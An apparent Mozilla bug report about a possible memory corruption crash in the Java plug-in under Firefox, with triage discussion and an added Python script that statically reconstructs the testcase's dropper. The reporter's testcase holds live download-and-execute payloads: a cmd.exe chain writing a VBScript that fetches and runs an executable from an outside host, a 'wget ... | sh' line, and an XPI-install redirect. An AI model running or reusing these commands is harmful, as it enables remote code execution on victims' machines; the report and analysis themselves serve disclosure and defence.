Closed Bug 904053 Opened 11 years ago Closed 8 years ago

WINDOWS possible memory corruption with INNERHTML and applet code when onmousemove

Categories

(Core Graveyard :: Plug-ins, defect)

22 Branch
x86
Windows 7
defect
Not set
critical

Tracking

(Not tracked)

RESOLVED INVALID

People

(Reporter: jordi.chancel, Unassigned)

Details

(4 keywords, Whiteboard: potentially exploitable java bug)

Crash Data

Attachments

(2 files, 4 obsolete files)

88.91 KB, application/octet-stream
1.45 MB, application/octet-stream
Attached file local 0day.zip (obsolete) —
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0 (Beta/Release)
Build ID: 20130729175331

Steps to reproduce:

https://crash-stats.mozilla.com/report/index/30b0bd53-5ec5-45d5-9be5-5cfde2130812

With this code, sometimes Mozilla Firefox doesn't crash, but sometimes Mozilla Firefox crashes with evidence of memory corruption. In a test session I found a possible critical memory corruption on Windows when you do

document.getElementById("jo").innerHTML = "<iframe src='http://127.0.0.1/Vulnerability%20Research/test%20remote%20xpi%20cover%20by%20persistant%20select/hack.html'></iframe><div ><font color=white>=</font></div>";

on onmousemove (http://127.0.0.1/Vulnerability%20Research/test%20remote%20xpi%20cover%20by%20persistant%20select/hack.html leads to this code:

<applet width='1' height='1' code='Client.class' archive='Client.jar'>
<param name='windows1' value='cmd.exe /c echo Const adTypeBinary = 1 > %temp%\winconfig.vbs & echo Const adSaveCreateOverWrite = 2 >> %temp%\winconfig.vbs & echo Dim S >> %temp%\winconfig.vbs & echo Dim A >> %temp%\winconfig.vbs & echo Dim DTNDTN >> %temp%\winconfig.vbs & echo S = "ADODB" >> %temp%\winconfig.vbs & echo A = ".Stream" >> %temp%\winconfig.vbs & echo Set DTNDTN = CreateObject(S+A) >> %temp%\winconfig.vbs & echo DTNDTN.Type = adTypeBinary >> %temp%\winconfig.vbs & echo DTNDTN.Open >> %temp%\winconfig.vbs & echo DTNDTN.Write BinaryGetURL(Wscript.Arguments(0)) >> %temp%\winconfig.vbs & echo DTNDTN.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> %temp%\winconfig.vbs & echo Function BinaryGetURL(URL) >> %temp%\winconfig.vbs & echo Dim Http >> %temp%\winconfig.vbs & echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") >> %temp%\winconfig.vbs & echo Http.Open "GET", URL, False >> %temp%\winconfig.vbs & echo Http.Send >> %temp%\winconfig.vbs & echo BinaryGetURL = Http.ResponseBody >> %temp%\winconfig.vbs & echo End Function >> %temp%\winconfig.vbs & echo Set shell = CreateObject("WScript.Shell") >> %temp%\winconfig.vbs & echo shell.Run "%temp%\update.exe" >> %temp%\winconfig.vbs & start %temp%\winconfig.vbs http://www.alternativ-testing.fr/calc.exe %temp%\update.exe'>
<param name='windows2' value=''>
<param name='unix1' value="">
<param name='unix2' value="">
<param name='linux1' value="wget http://www.alternativ-testing.fr/calc.exe -O- | sh">
<param name='linux2' value="">
</applet>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Firefox 0day</title>
</head>
<body>
<body bgcolor="black" text="black" link="blue" vlink="purple" alink="red">
<p>&nbsp;</p>
</body>
<script language="JavaScript">
navigator.geolocation.getCurrentPosition(LocationOK, LocationKO);
function LocationOK(position) {
  var latitude = position.coords.latitude;
  var longitude = position.coords.longitude;
  alert('Location: ' + latitude + ', ' + longitude);
}
function LocationKO() {
  alert('You\'re lost !');
}
</script>
</body>
</html>
<script> document.location ='./hackcalc.xpi'; </script>

). Memory corruption is observed.

Actual results:

Mozilla Firefox crashes.

Expected results:

Mozilla Firefox leads to a crash with evidence of memory corruption.
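The `windows1` applet parameter in comment 0 is a cmd.exe echo chain that writes a VBScript downloader to %temp% and then runs it. The helper below is an added analysis example, not part of this bug, its attachments or the reporter's Client.jar: it replays the `>` / `>>` redirections into an in-memory file table and ties the `start` arguments to `Wscript.Arguments(0)` and `(1)` in the dropped script, so an analyst can see what the payload fetches and executes without running it. The command line is copied from the testcase above; the %temp% value in ENV is an assumed victim path, and the plain split on `&` is only exact because the echoed script contains no `&`, `|`, `^` or quoted separators.

```python
import re

# `windows1` applet parameter from the testcase in comment 0, copied verbatim and
# wrapped with implicit string concatenation (one cmd.exe statement per line).
WINDOWS1 = (
    r'cmd.exe /c echo Const adTypeBinary = 1 > %temp%\winconfig.vbs '
    r'& echo Const adSaveCreateOverWrite = 2 >> %temp%\winconfig.vbs '
    r'& echo Dim S >> %temp%\winconfig.vbs '
    r'& echo Dim A >> %temp%\winconfig.vbs '
    r'& echo Dim DTNDTN >> %temp%\winconfig.vbs '
    r'& echo S = "ADODB" >> %temp%\winconfig.vbs '
    r'& echo A = ".Stream" >> %temp%\winconfig.vbs '
    r'& echo Set DTNDTN = CreateObject(S+A) >> %temp%\winconfig.vbs '
    r'& echo DTNDTN.Type = adTypeBinary >> %temp%\winconfig.vbs '
    r'& echo DTNDTN.Open >> %temp%\winconfig.vbs '
    r'& echo DTNDTN.Write BinaryGetURL(Wscript.Arguments(0)) >> %temp%\winconfig.vbs '
    r'& echo DTNDTN.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> %temp%\winconfig.vbs '
    r'& echo Function BinaryGetURL(URL) >> %temp%\winconfig.vbs '
    r'& echo Dim Http >> %temp%\winconfig.vbs '
    r'& echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") >> %temp%\winconfig.vbs '
    r'& echo Http.Open "GET", URL, False >> %temp%\winconfig.vbs '
    r'& echo Http.Send >> %temp%\winconfig.vbs '
    r'& echo BinaryGetURL = Http.ResponseBody >> %temp%\winconfig.vbs '
    r'& echo End Function >> %temp%\winconfig.vbs '
    r'& echo Set shell = CreateObject("WScript.Shell") >> %temp%\winconfig.vbs '
    r'& echo shell.Run "%temp%\update.exe" >> %temp%\winconfig.vbs '
    r'& start %temp%\winconfig.vbs http://www.alternativ-testing.fr/calc.exe %temp%\update.exe'
)

# Assumed victim environment: whatever cmd.exe would expand %temp% to.
ENV = {'temp': r'C:\Users\victim\AppData\Local\Temp'}

# `echo <text> > <file>` or `echo <text> >> <file>`; trailing blanks before the
# redirection are swallowed by \s* so they do not end up in the dropped file.
ECHO_RE = re.compile(r'^echo\s(.*?)\s*(>>|>)\s*(\S+)$', re.I)


def expand_env(text, env):
    """Expand %VAR% case-insensitively, as cmd.exe does before running a line."""
    return re.sub(r'%(\w+)%', lambda m: env.get(m.group(1).lower(), m.group(0)), text)


def split_chain(cmdline):
    """Drop a leading `cmd.exe /c` and split on `&` (exact only for chains with
    no quoted or escaped separators, which holds for this testcase)."""
    body = re.sub(r'^\s*cmd(?:\.exe)?\s+/c\s+', '', cmdline, flags=re.I)
    return [s.strip() for s in body.split('&') if s.strip()]


def reconstruct_dropper(cmdline, env):
    """Replay the echo redirections into memory.

    Returns (files, launches): files maps expanded path -> dropped content,
    launches lists (program, args) for each `start` statement."""
    files, launches = {}, []
    for stmt in split_chain(cmdline):
        m = ECHO_RE.match(stmt)
        if m:
            text, op, target = m.groups()
            path = expand_env(target, env)
            if op == '>':                       # `>` truncates, `>>` appends
                files[path] = []
            files.setdefault(path, []).append(expand_env(text, env))
            continue
        if stmt.lower().startswith('start '):   # `start <program> <args...>`
            parts = expand_env(stmt[6:], env).split()
            launches.append((parts[0], parts[1:]))
    return {p: '\r\n'.join(lines) + '\r\n' for p, lines in files.items()}, launches


def summarize(cmdline, env):
    """Bind the `start` arguments to Wscript.Arguments(0)/(1) in the dropped script."""
    files, launches = reconstruct_dropper(cmdline, env)
    script_path, args = launches[0]
    script = files[script_path]
    run = re.search(r'shell\.Run\s+"([^"]+)"', script)
    return {
        'script': script_path,
        'download_url': args[0],             # Wscript.Arguments(0): fetched by WinHttp
        'saved_as': args[1],                 # Wscript.Arguments(1): ADODB.Stream target
        'uses_winhttp': 'WinHttp.WinHttpRequest.5.1' in script,
        'runs': run.group(1) if run else None,
    }


if __name__ == '__main__':
    dropped, _ = reconstruct_dropper(WINDOWS1, ENV)
    for path, content in dropped.items():
        print(f'--- {path}\n{content}')
    print(summarize(WINDOWS1, ENV))
```

Running it prints the 21-line winconfig.vbs exactly as cmd.exe would have written it and a summary showing that the script downloads calc.exe from www.alternativ-testing.fr over WinHttp, saves it as %temp%\update.exe and runs it through WScript.Shell; this also explains Matt's "Windows cannot find ...\winconfig.vbs" dialog in the local run, where the `start` fires but the file was never written.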
Attachment #788926 - Attachment is obsolete: true
Crash Signature: https://crash-stats.mozilla.com/report/index/30b0bd53-5ec5-45d5-9be5-5cfde2130812
Attached file 0day.zip (obsolete) —
Attached video Windowd Exemple (obsolete) —
Attached file local 0day.zip (obsolete) —
Attachment #788940 - Attachment is obsolete: true
The stack in bp-30b0bd53-5ec5-45d5-9be5-5cfde2130812 looks like the crash is in the Java plug-in (npjp2.dll). -> Plug-ins for further triage
Severity: normal → critical
Component: General → Plug-ins
Keywords: crash, testcase
Jordi, which version of Java are you using?
Flags: needinfo?(jordi.chancel)
Last version of Java. Please test the testcase locally and close/open Firefox for each test.
Flags: needinfo?(jordi.chancel)
Jordi, please write the exact version so that future readers of this bug know which version was meant by "last version". Thanks
Java(TM) Platform SE 7 U25 10.25.2.17
Flags: sec-bounty?
Crash Signature: https://crash-stats.mozilla.com/report/index/30b0bd53-5ec5-45d5-9be5-5cfde2130812 → [@ npjp2.dll@0xc2bc ]
Attachment #789013 - Attachment mime type: application/octet-stream → video/mp4
Attachment #789018 - Attachment mime type: application/octet-stream → application/java-archive
Multiple crashes lead to an access violation read on address 0x00000004, but some crashes, like https://crash-stats.mozilla.com/report/index/a009099a-1fe5-4e07-94b3-365742130813 and https://crash-stats.mozilla.com/report/index/30b0bd53-5ec5-45d5-9be5-5cfde2130812, lead to evidence of memory corruption.
https://crash-stats.mozilla.com/report/index/a009099a-1fe5-4e07-94b3-365742130813
Crash Reason: EXCEPTION_ACCESS_VIOLATION_READ
Crash Address: 0x2f6d6f63
-----------
https://crash-stats.mozilla.com/report/index/30b0bd53-5ec5-45d5-9be5-5cfde2130812
Crash Reason: EXCEPTION_ACCESS_VIOLATION_EXEC
Crash Address: 0x2ffdb71
Flags: needinfo?(mwobensmith)
The steps to reproduce this bug are unclear. Please create steps, in the order to be executed. Is this test run locally or from a web server? What file is to be opened first? I ran the files myself - both from a web server and locally. When run from a web server, I see the Firefox doorhanger dialogs for geolocation and XPI install repeatedly, but no crash. When run locally, I see a dialog that says: "Windows cannot find 'C:\Users\myusername\AppData\Local\Temp\winconfig.vbs'. Make sure you typed the name correctly, and then try again." In both cases, I see no crash. I'm using the latest JRE 7u25 on Win7 as well.
Flags: needinfo?(mwobensmith)
Jordi, Matt cannot reproduce this. Can you work with him to answer his questions? Thanks.
Flags: needinfo?(jordi.chancel)
Attached file local 0day
Go to 1.html and move the mouse on this page. If Firefox doesn't crash this time, please close Firefox, open it, and retry all steps (move the mouse on 1.html). I repeat, this testcase works only for Windows.
Attachment #789013 - Attachment is obsolete: true
Attachment #789018 - Attachment is obsolete: true
Flags: needinfo?(jordi.chancel)
1.html should be opened locally to test the crash, but Firefox can crash remotely, more rarely.
Attached file Windows exemple
Jordi, what exact version of Windows 7 are you running? Go to command line, type "ver" and tell me what that says.
The crash itself seems to be pretty common with Java, see https://crash-stats.mozilla.com/report/list?signature=npjp2.dll%400xc2bc
I'm going to confirm that there does appear to be a real Java bug here based on the crash-stats reports in comment 17, even if we're having trouble reproducing with this particular testcase. All the crashes, even the ones Jordi links to, appear to be x86 and not 64-bit despite the user agent in comment 0. Would be interesting to try in Chrome, although there could be some browser/plugin interaction that's involved rather than a pure Java bug. This is probably worth blocklisting Java 1.7 u25 over. I know we're going to blocklist it in Fx26 anyway, but we could do it now based on this.
Status: UNCONFIRMED → NEW
Ever confirmed: true
Flags: needinfo?(benjamin)
Keywords: sec-vector
Hardware: x86_64 → x86
Whiteboard: potentially exploitable java bug
Has anyone filed this with Oracle? We're blocking Java in bug 914690 (Fx24+) and I don't think this bug changes that calculation at all.
Flags: needinfo?(benjamin)
Doesn't crash on Google Chrome.
This is a Java bug, so it is not eligible for our bounty.
Flags: sec-bounty? → sec-bounty-
Group: core-security → dom-core-security
I'm going to close this in our bug tracker, but leave it private since I don't see confirmation that this was ever reported to Oracle.
Status: NEW → RESOLVED
Closed: 8 years ago
Resolution: --- → INVALID
Group: dom-core-security
Product: Core → Core Graveyard